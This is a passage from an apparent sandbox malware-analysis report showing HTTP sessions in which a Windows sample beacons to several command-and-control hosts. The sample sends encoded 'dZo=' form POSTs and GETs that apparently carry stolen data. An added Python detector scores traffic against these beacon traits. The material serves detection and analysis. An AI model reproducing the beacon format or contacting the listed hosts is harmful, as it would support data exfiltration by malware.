                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      28 | 192.168.2.9 | 54138 | 203.161.55.102 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Aug 18, 2024 18:26:29.592091084 CEST | 439 | OUT | GET /irn0/?dZo=rkk12BbGqxBZ8yyWFarCeZT80GKzND/TKAT51RD3LUS3uLR6Pe1z8Bplr8mj2yMFe4BX6hO/FEyyRDMjbgdyK4b8CTwfAsUn2lCVR5NZfuQrKb84WQ==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.slushcafe.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Aug 18, 2024 18:26:30.196692944 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                      Date: Sun, 18 Aug 2024 16:26:30 GMT
                                                      Server: Apache
                                                      Content-Length: 389
                                                      Connection: close
                                                      Content-Type: text/html; charset=utf-8
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
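Sessions 22 to 28 show the same beacon shape against two different hosts: a fixed Linux Chrome/42 User-Agent sent by a process running on the Windows sandbox, an Origin and Referer that point back at the request's own host and path, a run of form POSTs whose body is a single `dZo=` key, and a closing GET that carries `dZo` plus a second `gta` parameter in the query string. The following is an added example, not code from the report, that turns those observable traits into a scoring rule over parsed HTTP requests. The sample requests are constructed from the sessions above (payloads shortened), the benign example.com requests are invented for contrast, and the `min_reasons` threshold is an assumption of this example rather than anything the report states.

```python
"""Heuristic detector for the beacon pattern seen in sessions 22 to 28.

Added example (not from the report). It parses raw HTTP/1.1 requests,
groups them by Host and scores each host's run of requests against the
traits visible in the capture.
"""
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# User-Agent string from the sample's POST/GET requests above.
FORMBOOK_UA = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 "
               "(KHTML, like Gecko) Chrome/42.0 Safari/537.31")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def _keys(query: str) -> list:
    """Parameter names of a form body or query string, in order."""
    return [k for k, _ in parse_qsl(query, keep_blank_values=True)]


def beacon_reasons(reqs: list) -> list:
    """Return the traits one host's ordered request run shares with the capture."""
    reasons = []
    host = reqs[0]["headers"].get("host", "")
    posts = [r for r in reqs if r["method"] == "POST"]
    gets = [r for r in reqs if r["method"] == "GET"]

    if all(r["headers"].get("user-agent") == FORMBOOK_UA for r in reqs):
        reasons.append("fixed X11/Linux Chrome/42 User-Agent from a Windows host")

    if posts and all(
        r["headers"].get("origin") == f"http://{host}"
        and r["headers"].get("referer") == f"http://{host}{r['target']}"
        for r in posts
    ):
        reasons.append("Origin and Referer point back at the request's own host and path")

    post_keys = {tuple(_keys(r["body"])) for r in posts}
    get_keys = {tuple(_keys(urlsplit(r["target"]).query)) for r in gets}
    if len(post_keys) == 1 and gets:
        (pk,) = post_keys
        if len(pk) == 1 and all(len(gk) == 2 and gk[0] == pk[0] for gk in get_keys):
            reasons.append(f"single form key {pk[0]!r} reused in POST bodies and GET query")

    paths = {urlsplit(r["target"]).path for r in reqs}
    if len(paths) == 1 and posts and gets and reqs[-1]["method"] == "GET":
        reasons.append("run of POSTs to one path closed by a GET to the same path")
    return reasons


def flag_beacons(raw_requests: list, min_reasons: int = 3) -> dict:
    """Group raw requests by Host and report hosts meeting the reason threshold.

    min_reasons=3 is this example's assumption; tune it against your traffic.
    """
    by_host = defaultdict(list)
    for raw in raw_requests:
        req = parse_request(raw)
        by_host[req["headers"].get("host", "")].append(req)
    flagged = {}
    for host, reqs in by_host.items():
        reasons = beacon_reasons(reqs)
        if len(reasons) >= min_reasons:
            flagged[host] = reasons
    return flagged


def _beacon(host: str, path: str, method: str, payload: str) -> str:
    """Build one request in the shape the report shows (constructed sample input)."""
    if method == "POST":
        return (f"POST {path} HTTP/1.1\r\nHost: {host}\r\nOrigin: http://{host}\r\n"
                f"Referer: http://{host}{path}\r\n"
                f"Content-Type: application/x-www-form-urlencoded\r\n"
                f"Content-Length: {len(payload)}\r\nConnection: close\r\n"
                f"User-Agent: {FORMBOOK_UA}\r\n\r\n{payload}")
    return (f"GET {path}?{payload} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n"
            f"User-Agent: {FORMBOOK_UA}\r\n\r\n")


BENIGN_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/128.0"  # invented
SAMPLE = [  # constructed from sessions 22-28; payloads shortened
    _beacon("www.kacotae.com", "/rdfm/", "POST", "dZo=9pMmvcz73uDu0jrBdWh1R9DkFpYUxD03VVkBMfFu"),
    _beacon("www.kacotae.com", "/rdfm/", "POST", "dZo=9pMmvcz73uDu0jrBdWh1R9DkFpYUxD03VVkBMfFu/qug"),
    _beacon("www.kacotae.com", "/rdfm/", "GET", "dZo=wrkGspiQ383g8BvTCApReourbo49wGJxXTgxDOVN343rP+tl&gta=rzqXf4A02FEl_8"),
    _beacon("www.slushcafe.top", "/irn0/", "POST", "dZo=mmMV1xSFqhYG9W6WMLjab8+HiX2fUXHPIBLG"),
    _beacon("www.slushcafe.top", "/irn0/", "POST", "dZo=mmMV1xSFqhYG/zyWNs3adc+As32fd3HLIBHG"),
    _beacon("www.slushcafe.top", "/irn0/", "GET", "dZo=rkk12BbGqxBZ8yyWFarCeZT80GKzND/TKAT5&gta=rzqXf4A02FEl_8"),
    # Invented ordinary browser traffic for contrast (not from the report).
    f"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: {BENIGN_UA}\r\n\r\n",
    (f"POST /login HTTP/1.1\r\nHost: www.example.com\r\nOrigin: http://www.example.com\r\n"
     f"Referer: http://www.example.com/login\r\nContent-Type: application/x-www-form-urlencoded\r\n"
     f"User-Agent: {BENIGN_UA}\r\n\r\nuser=alice&pass=hunter2"),
]

if __name__ == "__main__":
    for host, reasons in flag_beacons(SAMPLE).items():
        print(host, "->", "; ".join(reasons))
```

Run against the constructed sample, both C2 hosts are reported with all four reasons while the example.com login flow collects only the self-referencing Origin/Referer trait, which any ordinary form submission also shows. In practice the same fields come from proxy logs or Zeek http.log rather than raw requests, and the User-Agent trait should be checked against the asset inventory (a Windows host claiming X11 Linux) rather than used alone.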


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      29 | 192.168.2.9 | 54139 | 216.83.33.145 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Aug 18, 2024 18:26:35.626837015 CEST | 689 | OUT | POST /mpex/ HTTP/1.1
                                                      Host: www.a9jcpf.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.a9jcpf.top
                                                      Referer: http://www.a9jcpf.top/mpex/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 55 5a 58 50 55 62 61 38 4c 41 76 6f 66 37 30 77 42 6f 56 4e 75 55 4b 73 79 4b 64 30 6d 58 45 33 47 42 66 36 58 76 72 44 6b 61 53 31 73 64 51 78 63 33 58 55 35 2b 6f 38 6a 61 41 72 38 58 39 35 75 6e 61 64 31 57 52 76 57 72 37 62 43 65 37 74 42 74 50 32 4e 7a 31 38 65 57 39 54 61 61 53 32 57 68 76 69 6b 63 53 4a 4f 58 7a 56 62 74 73 59 32 36 63 2f 66 4b 6e 41 5a 58 49 47 57 2f 45 73 6b 41 65 6d 6e 55 35 74 30 43 6e 57 75 4b 2b 4f 4f 4d 42 30 41 62 64 6d 74 67 7a 76 50 31 69 72 36 2f 65 41 59 42 50 35 72 35 7a 72 53 4e 5a 47 71 4e 4d 35 76 46 63 67 4f 35 51 6f
                                                      Data Ascii: dZo=UZXPUba8LAvof70wBoVNuUKsyKd0mXE3GBf6XvrDkaS1sdQxc3XU5+o8jaAr8X95unad1WRvWr7bCe7tBtP2Nz18eW9TaaS2WhvikcSJOXzVbtsY26c/fKnAZXIGW/EskAemnU5t0CnWuK+OOMB0AbdmtgzvP1ir6/eAYBP5r5zrSNZGqNM5vFcgO5Qo
                                                      Aug 18, 2024 18:26:36.533597946 CEST | 208 | IN | HTTP/1.1 530
                                                      Date: Sun, 18 Aug 2024 16:26:36 GMT
                                                      Content-Type: text/html;charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Server: cdn
                                                      Data Raw: 32 63 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 31 36 2e 38 33 2e 33 33 2e 31 34 35 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 2c ➡️ Current node being accessed: 216.83.33.145 0  (the chunk body is UTF-8 Chinese text, "当前访问的节点：216.83.33.145", which the report's ASCII rendering strips; "2c" is the chunk size and "0" the last-chunk marker)


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      30 | 192.168.2.9 | 54140 | 216.83.33.145 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Aug 18, 2024 18:26:38.152477980 CEST | 713 | OUT | POST /mpex/ HTTP/1.1
                                                      Host: www.a9jcpf.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.a9jcpf.top
                                                      Referer: http://www.a9jcpf.top/mpex/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Ascii: dZo=UZXPUba8LAvofaEwEP5N5EKtu6d0zHFwGBj6Xr6bksi1s4sxdy7U4+o8p6Au4X9iunHi1X9vWvTbCcztCaT1Pj1yHG9RX6S2WhvikcXSOXrVaccY3eI+BanPR3IGS/EokAeYnV1H0BTWuLOOPdB1JbdkjAzwf3z+7eiSQQHQq4X9cM5Y7/Fi6ScHJeZA5CFawWlkKJhBZiDw4mRqdw==
                                                       Aug 18, 2024 18:26:39.070369005 CEST | 208 | IN | HTTP/1.1 530
                                                      Date: Sun, 18 Aug 2024 16:26:38 GMT
                                                      Content-Type: text/html;charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Server: cdn
                                                       Data Ascii: 2c➡️当前访问的节点：216.83.33.145 0


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       31 | 192.168.2.9 | 54141 | 216.83.33.145 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Aug 18, 2024 18:26:40.685551882 CEST | 1726 | OUT | POST /mpex/ HTTP/1.1
                                                      Host: www.a9jcpf.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.a9jcpf.top
                                                      Referer: http://www.a9jcpf.top/mpex/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Ascii: dZo=UZXPUba8LAvofaEwEP5N5EKtu6d0zHFwGBj6Xr6bksq1su4xfRDU7+o8q6Av4X84unfm1WAaWpXbC5/tDun1Vz1yIm9UaaSZWh/ukf/SOXrVaeEY+qc+DanAZXIKW/EAkB2unVh90SLWpreOMvp1GbdizQylf3+u7dGvQQz+q/j9eI8G/+8/lQgWOtshhHJYqWMvKqtnOzKF81sPOefivqY/N6gjxIr5t1NbS2zGXDbyFozu9jFG3+RdnyuD6DpAUKZZm1cV0k+dZ9nxHkIBksCFl0uhgy2AX0R8BV0tCvjiQWxPHimqt7LzjK3SD8PsIgcJb8rtXM19PkxrXHS0+bJYo0JssW55kqisbeQo2fWsWlpJxgSipfnhnnFyy7wwLwPDRvPKruiPArUCM/BKDo4TloWeBCfAoNQ8aX57FC+XIloRwDklEhMbkS8emAxv7Wcp1FyHX9v0jDIGTv1I9ZGnAHlmHuIqfAd3+PxHX2MLKUSqAd25R8oZoHSpzR7xVyT6qhkF/tTMY7ZxYX4Zo59x+YDdSzR3RJxFlcqZ+N+H3IGGkc+kG7He009Bedych1/XqD5XHs3EjLk8+TGBPcWg+ZogpZ0+O/+0T6wwK95AT1B49MFHhSHk33fB0euI3doOekgPExTXaRHWuLitY5ghIo05acGwo+jLDYw3Cc5NRH6xYun1HbPQBV0nJGLf0lr4TQ8QmsPk+eqniSNVDo33wsBW4myDeqUdNzXP/dMkmZqEh7IiQHH578Wh0hOj0JdDf4Y5trIb8tKHoN6tlUx7BMiCIRcPNlf0aslx1fhOu4D8876mVEUstZyxLso+xVgmvA2iB2EBcj64eoqPGpQ3jWSylUl7jUtdnlLwTTxEIWhy9gXPN/f7lBDHvSvz3pYg8s9Qfoph51l9RCUhkTqLiJ6rACBPxL63FEhyL1EJejVdISrc09hIvxIJ/aC4R3bSwC/hu+il9D2yX7wzODH4zWGpcb4XQRe4C8/3E8Y+dHZl [TRUNCATED]
                                                       Aug 18, 2024 18:26:41.584238052 CEST | 208 | IN | HTTP/1.1 530
                                                      Date: Sun, 18 Aug 2024 16:26:41 GMT
                                                      Content-Type: text/html;charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Server: cdn
                                                       Data Ascii: 2c➡️当前访问的节点：216.83.33.145 0


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       32 | 192.168.2.9 | 54142 | 216.83.33.145 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Aug 18, 2024 18:26:43.384511948 CEST | 436 | OUT | GET /mpex/?dZo=Zb/vXsPYNAfjWKU6DONX2DmivYpazk1zNhfSVr6onri574wTGgCf5cxGoeAVsjx/n1bbhUl7cIXTAf7wH/T3VTZ4C1VoYJ2+BjO5oufoKkfdfMAaow==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.a9jcpf.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                       Aug 18, 2024 18:26:44.311353922 CEST | 208 | IN | HTTP/1.1 530
                                                      Date: Sun, 18 Aug 2024 16:26:44 GMT
                                                      Content-Type: text/html;charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Server: cdn
                                                       Data Ascii: 2c➡️当前访问的节点：216.83.33.145 0


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       33 | 192.168.2.9 | 54143 | 35.241.42.217 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Aug 18, 2024 18:26:49.988517046 CEST | 695 | OUT | POST /zjwj/ HTTP/1.1
                                                      Host: www.tqfabxah.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.tqfabxah.com
                                                      Referer: http://www.tqfabxah.com/zjwj/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Ascii: dZo=qFjiaTJPEXcUfgf10GlzAljtNOf/ugjud4kXtDMxlSaPxGHIX8aUhd1t5jmKVeO85bvXwIYtnDOeHakqNr39GQfvGS8Q7itQoF2JjHGkHh6ghqi39i7IcRBIKymclL+NNllHtp8A6zjOnPZtMcoUXJPoC4C9JD4bxFIMJn89Sa1SgkPIU0l1zB2zYuhJ
                                                       Aug 18, 2024 18:26:50.632245064 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                                                      Server: nginx/1.20.2
                                                      Date: Sun, 18 Aug 2024 16:26:50 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 559
                                                      Via: 1.1 google
                                                      Connection: close
                                                       Aug 18, 2024 18:26:50.634627104 CEST | 559 | IN | Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       34 | 192.168.2.9 | 54144 | 35.241.42.217 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Aug 18, 2024 18:26:52.529439926 CEST | 719 | OUT | POST /zjwj/ HTTP/1.1
                                                      Host: www.tqfabxah.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.tqfabxah.com
                                                      Referer: http://www.tqfabxah.com/zjwj/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Ascii: dZo=qFjiaTJPEXcUeAv1xlNzBFjuCuf/kAjyd4YXtC50ww+PyjrIYYuUid1thTmDa+ON5bz1wJktnAyeHYsqNYv8HAfpAS9WjCtQoF2JjGjDHhighay39HbHVxBLNymcyb+JNlkittcq6xrOnOJtLNpCZJPyc4CrYCYe0FVUIko7IJl9nFvWFGsumW2UfJohPoqjRj9+UMde0bxicRJx+w==
                                                       Aug 18, 2024 18:26:53.193691015 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                                                      Server: nginx/1.20.2
                                                      Date: Sun, 18 Aug 2024 16:26:53 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 559
                                                      Via: 1.1 google
                                                      Connection: close
                                                       Aug 18, 2024 18:26:53.197258949 CEST | 559 | IN | Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       35 | 192.168.2.9 | 54145 | 35.241.42.217 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Aug 18, 2024 18:26:55.059035063 CEST | 1732 | OUT | POST /zjwj/ HTTP/1.1
                                                      Host: www.tqfabxah.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.tqfabxah.com
                                                      Referer: http://www.tqfabxah.com/zjwj/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                       Aug 18, 2024 18:26:55.734154940 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                                                      Server: nginx/1.20.2
                                                      Date: Sun, 18 Aug 2024 16:26:55 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 559
                                                      Via: 1.1 google
                                                      Connection: close
                                                       Aug 18, 2024 18:26:55.739684105 CEST | 559 | IN | Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       36 | 192.168.2.9 | 54146 | 35.241.42.217 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Aug 18, 2024 18:26:57.592564106 CEST | 438 | OUT | GET /zjwj/?dZo=nHLCZn8vN2ArVDTu2n5oID6vRNbj9hrWV4l8hQoFqQuK0GTLFPexr5xj3EirNaSr0bv3za4OohaILLkKIoyZXyXWPQEhmyBEuX+CqEarOAabuvO7hw==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.tqfabxah.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                       Aug 18, 2024 18:26:58.234942913 CEST | 300 | IN | HTTP/1.1 200 OK
                                                      Server: nginx/1.20.2
                                                      Date: Sun, 18 Aug 2024 16:26:58 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 5161
                                                      Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                                                      Vary: Accept-Encoding
                                                      ETag: "65a4939c-1429"
                                                      Cache-Control: no-cache
                                                      Accept-Ranges: bytes
                                                      Via: 1.1 google
                                                      Connection: close
                                                       Aug 18, 2024 18:26:58.248225927 CEST | 1236 | IN | Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                                                       Aug 18, 2024 18:26:58.248235941 CEST | 1236 | IN | Data Ascii: w Image).src=n}function reportLoading(n){n=n||{};var o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.
                                                       Aug 18, 2024 18:26:58.248260975 CEST | 1236 | IN | Data Ascii: tr=dsfrpfvedncpssntnwbipreimeutsv");(e()||r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/ap
                                                       Aug 18, 2024 18:26:58.248270035 CEST | 1236 | IN | Data Ascii: ("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src
                                                       Aug 18, 2024 18:26:58.248286009 CEST | 217 | IN | Data Ascii: </div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       37 | 192.168.2.9 | 54147 | 76.223.67.189 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Aug 18, 2024 18:27:03.377296925 CEST | 710 | OUT | POST /l2ei/ HTTP/1.1
                                                      Host: www.rtrpodcast.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.rtrpodcast.online
                                                      Referer: http://www.rtrpodcast.online/l2ei/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Ascii: dZo=7PZJRSXxbWSlqlOJ1dD35IBxcMKz0LuhBFgNcClGbVMzdnqoC9wxfSwG+krSOz8bNWX4USeEBemkLwZ7PhMZ4ZUPIWoPLF5xstQ4zk4Y99hnMRsCK+tTlCDXnMBY/wJEsGyqFdwGk68yZsIP91zZIJCilehkNkMWgNiXCDRqByU4gm2KLcYg2NObfz6w


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       38 | 192.168.2.9 | 54148 | 76.223.67.189 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Aug 18, 2024 18:27:05.989432096 CEST | 734 | OUT | POST /l2ei/ HTTP/1.1
                                                      Host: www.rtrpodcast.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
